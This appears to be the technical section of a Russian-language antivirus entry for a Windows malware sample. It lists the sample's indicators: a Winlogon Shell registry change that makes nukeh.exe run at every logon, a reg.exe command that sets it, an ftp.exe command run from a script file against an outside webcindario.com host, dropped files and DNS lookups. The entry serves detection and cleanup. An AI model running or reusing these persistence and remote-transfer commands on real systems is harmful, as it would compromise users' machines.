Техническая информация
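- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe <SYSTEM32>\nukeh.exe' (закрепление в системе: значение Shell отличается от штатного 'explorer.exe', из-за чего nukeh.exe запускается при каждом входе пользователя в систему; при проверке и восстановлении системы это значение следует сверить со штатным)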
- '<SYSTEM32>\ftp.exe' -s:%WINDIR%\transfer.txt ftp.webcindario.com
- '<SYSTEM32>\reg.exe' add hklm\software\microsoft\windows" "NT\currentversion\winlogon /v Shell /t REG_SZ /d explorer.exe" "<SYSTEM32>\nukeh.exe /f
- '%WINDIR%\explorer.exe' <Текущая директория><Имя вируса>
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\fuck[1].htm
- %WINDIR%\transfer.txt
- <SYSTEM32>\nukeh.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\fuck[1].htm
- 'localhost':1039
- 'ft#.##bcindario.com':21
- 'ce#######orelia.webcindario.com':80
- ce#######orelia.webcindario.com/fuck.htm
- DNS ASK ft#.##bcindario.com
- DNS ASK ce#######orelia.webcindario.com